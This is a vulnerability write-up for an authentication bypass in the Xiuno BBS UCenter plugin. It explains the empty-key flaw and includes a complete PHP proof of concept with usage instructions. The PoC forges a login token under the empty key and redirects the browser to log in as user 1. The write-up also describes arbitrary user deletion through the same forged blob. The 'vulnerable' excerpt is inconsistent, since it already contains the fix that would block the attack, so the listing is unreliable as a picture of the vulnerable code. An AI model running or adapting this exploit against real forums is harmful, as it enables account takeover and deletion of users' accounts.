0x00 Vulnerability Overview
0x01 Code Parsing
0x02 PoC
0x00 Vulnerability Overview
- Xiuno ships a plugin that logs users in through the UCenter ("uc") API.
- The uc plugin is not enabled by default.
- When the plugin is not enabled, its shared secret `uc_appkey` is empty. The encrypt/decrypt helper the plugin exposes (`uc_authcode`) derives all of its key material from `md5($key)`, so with an empty key it runs under the public constant `md5('')` and anyone can mint a blob that the helper accepts. The plugin's API entry point (`plugin/ucenter/api/uc.php`) still serves requests in this state, which is what turns the empty key into an authentication bypass.
- uc.php decrypts the `code` parameter with that key and dispatches on the `action` field it contains. For `action=synlogin` the `uid` carried in the blob is used to log the visitor into the forum front-end as that user: no password is involved, and the code as excerpted does not verify that the uid resolves to an existing user before setting the login cookie. The same blob format also reaches a `deleteuser` branch that deletes every uid listed, so the defect is both an authentication bypass and an arbitrary-user deletion.
- Practical fix: refuse to serve the uc API while `uc_appkey` is empty (or while the plugin is disabled), and treat an empty result from `uc_authcode` as a hard failure rather than dispatching on an unset action.
0x01 Code Parsing
The excerpt below is from Xiuno 2.0, file plugin/ucenter/api/uc.php (the path the PoC requests). Note that the page rendering mangled identifiers and operators in the listing (for example `$ Code` for `$code` and `-& gt;` for `->`), and that the `elseif` branches shown are part of a longer action dispatch whose earlier branches are not reproduced.
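// Entry point of the uc API bridge. Everything that follows trusts the
// contents of the encrypted "code" blob, so the strength of that blob is the
// whole access control for this endpoint.
$code = core::gpc('code');

// Fix for the bypass: the blob is authenticated under md5(uc_appkey). While
// the uc plugin is not enabled uc_appkey is empty, the key collapses to the
// public constant md5('') and any client can mint a blob that decrypts and
// verifies. Refuse to serve the API until a key has been configured.
// (empty() is deliberately not used so that a key of "0" is still accepted.)
if (!isset($ucconf['uc_appkey']) || $ucconf['uc_appkey'] === '') {
    exit;
}

// Decrypt the code parameter with the key and unpack its key=value pairs
// into $get. The uc_authcode shown in the PoC returns '' when the embedded
// MAC or expiry check fails, which leaves $get empty, so default the action
// to '' instead of reading an unset index.
parse_str(uc_authcode($code, 'decode', $ucconf['uc_appkey']), $get);
$action = isset($get['action']) ? $get['action'] : '';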
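// Excerpt: earlier branches of the action dispatch precede this point.
// If the action is synlogin, log the visitor in as the uid carried in the
// decrypted blob. No password is involved: possession of a blob the key
// accepts is the only credential, which is why an empty uc_appkey is fatal.
elseif ($action == 'synlogin') {
    $uid = isset($get['uid']) ? intval($get['uid']) : 0;
    $muser = new user();
    $userdb = $muser->read($uid);
    // Only issue the login cookie for a record that actually exists. The
    // original passed whatever read() returned straight to set_login_cookie().
    if (!empty($userdb)) {
        $muser->set_login_cookie($userdb);
    }
    exit(API_RETURN_SUCCEED);
}
// Arbitrary user deletion: the same forged blob can name any set of uids.
// NOTE(review): the page's listing reads the list from $get['kids']; confirm
// that key against the plugin source before relying on it.
elseif ($action == 'deleteuser') {
    $uids = isset($get['kids']) ? $get['kids'] : '';
    $uids = str_replace("'", '', $uids);
    $muser = new user();
    foreach (explode(',', $uids) as $uid) {
        $uid = intval($uid);
        // Skip blanks and non-numeric entries instead of calling xdelete(0);
        // whether xdelete() treats 0 or negatives specially is not visible here.
        if ($uid <= 0) {
            continue;
        }
        $muser->xdelete($uid);
    }
    exit(API_RETURN_SUCCEED);
}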
0x02 PoC
<?php
/*
 * Xiuno BBS RC2 front-end authorization bypass — proof of concept
 * Author: ztz @ Dis9Team
 * Mail: ztz5651483@gmail.com
 * Blog: ztz.fuzzexp.org
 *
 * Usage:
 *   $_GET['target']: target host name (the forum's domain)
 *   $_GET['ip']:     target IP address (only used by send(), see below)
 *
 * Example:
 *   http://yoursite.com/xiuno.php?target=www.xiuno.com&ip=114.113.224.156
 * The script redirects the browser to the forged synlogin URL; then open the
 * forum home page manually to see the resulting session.
 */
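/**
 * UCenter-style authcode: RC4-keystream encrypt/decrypt with a 4-character
 * per-message salt, an optional expiry and a 16-character truncated-md5 MAC.
 * It mirrors the uc_authcode that uc.php calls to unwrap the "code"
 * parameter, so the PoC can mint blobs the plugin accepts.
 *
 * Why the bypass works: all key material is derived from md5($key). While the
 * uc plugin is disabled the server's key is '', md5('') is a public constant,
 * and anyone can run this function with '' as the key.
 *
 * @param string $string    plaintext (encode) or blob (decode)
 * @param string $operation 'encode' or 'decode' (lower-case, as the plugin passes it)
 * @param string $key       shared secret; '' reproduces the disabled-plugin state
 * @param int    $expiry    lifetime in seconds for encode; 0 means never expires
 * @return string           the blob, the recovered plaintext, or '' when the
 *                          MAC or expiry check fails on decode
 */
function uc_authcode($string, $operation = 'decode', $key = '', $expiry = 0)
{
    $ckey_length = 4;

    $key  = md5($key);
    $keya = md5(substr($key, 0, 16));   // keystream key half
    $keyb = md5(substr($key, 16, 16));  // MAC key half
    // Per-message salt: read from the front of the blob on decode, random on encode.
    $keyc = $ckey_length
        ? ($operation == 'decode'
            ? substr($string, 0, $ckey_length)
            : substr(md5(microtime()), -$ckey_length))
        : '';
    $cryptkey   = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);

    // Decode: strip the salt and base64. Encode: prepend a 10-digit expiry
    // timestamp (0 = never) and the MAC of plaintext||keyb, then the plaintext.
    $string = $operation == 'decode'
        ? base64_decode(substr($string, $ckey_length))
        : sprintf('%010d', $expiry ? $expiry + time() : 0)
            . substr(md5($string . $keyb), 0, 16)
            . $string;
    $string_length = strlen($string);
    $result = '';

    // RC4 key scheduling. The page's listing shows range(1, 0,255) here, which
    // would leave the S-box almost empty; the S-box must start as the identity
    // permutation 0..255 or the keystream will not match the server's.
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // RC4 keystream generation: XOR each input byte with the next output byte.
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if ($operation == 'decode') {
        // Accept when not expired (expiry field 0 or still in the future) and
        // the MAC matches. The expiry test intentionally uses loose == so that
        // "0000000000" equals 0; the MAC test uses === so that PHP's numeric
        // string comparison ("0e..." == "0e...") cannot be used to forge it.
        $expires = substr($result, 0, 10);
        if (($expires == 0 || $expires - time() > 0)
            && substr($result, 10, 16) === substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        }
        return '';
    }

    // The salt travels in the clear ahead of the base64 body; '=' padding is
    // dropped and base64_decode tolerates its absence.
    return $keyc . str_replace('=', '', base64_encode($result));
}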
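/**
 * Issue one raw HTTP GET for $request against $ip:80 and return the value of
 * the first Set-Cookie header in the response, or '' when the connection
 * fails or no cookie is set.
 *
 * Not called by the script as shipped (it redirects the browser instead); it
 * is the only consumer of the "ip" parameter the header comment documents.
 *
 * @param string $request full URL including path and query
 * @param string $ip      address to connect to (the Host header carries the
 *                        URL's host name so name-based virtual hosts resolve)
 * @return string
 */
function send($request, $ip)
{
    $meta  = parse_url($request);
    $path  = isset($meta['path'])  ? $meta['path']  : exit('path error');
    $host  = isset($meta['host'])  ? $meta['host']  : exit('host error');
    $query = isset($meta['query']) ? $meta['query'] : exit('query error');

    $packet  = "GET $path?$query HTTP/1.1\r\n";
    $packet .= "User-Agent: Mozilla/5.0\r\n";
    // The original sent the literal address as Host, which defeats the point
    // of taking a separate target name.
    $packet .= "Host: $host\r\n";
    $packet .= "Connection: Close\r\n";
    // Blank line ending the request head. The original never sent it, so the
    // server kept waiting for more headers.
    $packet .= "\r\n";

    $fp = @fsockopen($ip, 80, $errno, $errstr, 10);
    if (!$fp) {
        return '';   // the original wrote to a false handle here
    }
    fputs($fp, $packet);
    $result = '';
    while (!feof($fp)) {
        $result .= fgets($fp, 4096);
    }
    fclose($fp);   // the original leaked the socket

    // Header names are case-insensitive; the original searched for
    // 'set-cooker' and so never matched anything.
    $begin = stripos($result, 'Set-Cookie:');
    if ($begin === false) {
        return '';
    }
    $begin += strlen('Set-Cookie:');
    $end = strpos($result, ';', $begin);
    if ($end === false) {
        $end = strpos($result, "\r\n", $begin);
    }
    if ($end === false) {
        $end = strlen($result);
    }
    return trim(substr($result, $begin, $end - $begin));
}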
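// ---- script body ------------------------------------------------------------
// Only a plain host name (optionally with a port) is accepted, so the value
// cannot smuggle a scheme, path or second host into the URL built below.
$target = isset($_GET['target']) ? $_GET['target'] : '';
if (!preg_match('/^[A-Za-z0-9.-]+(:\d{1,5})?$/', $target)) {
    exit('target error');
}
// Documented and exemplified as the "ip" query parameter (the listing read
// $_GET['IP'], which the example URL never sets). Only send() consumes it and
// this path does not call send(); kept for parity with the header comment.
$ip = isset($_GET['ip']) ? $_GET['ip'] : '';

// Forge the blob. The server decrypts with uc_appkey, which is '' while the
// uc plugin is disabled, so encoding with '' here yields a blob it accepts.
// time is carried because code not shown in the excerpt presumably checks it
// for freshness; uid=1 is the first account created (adjust as needed).
$time = time();
$str = "time=$time&action=synlogin&uid=1";
$en_str = uc_authcode($str, 'encode', '');
$request = "http://$target/plugin/ucenter/api/uc.php?code=" . urlencode($en_str);

// Hand the browser off to the target so its own cookie jar receives the
// login cookie set by the synlogin branch; then open the forum home page.
header("Location: $request", true, 302);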
?>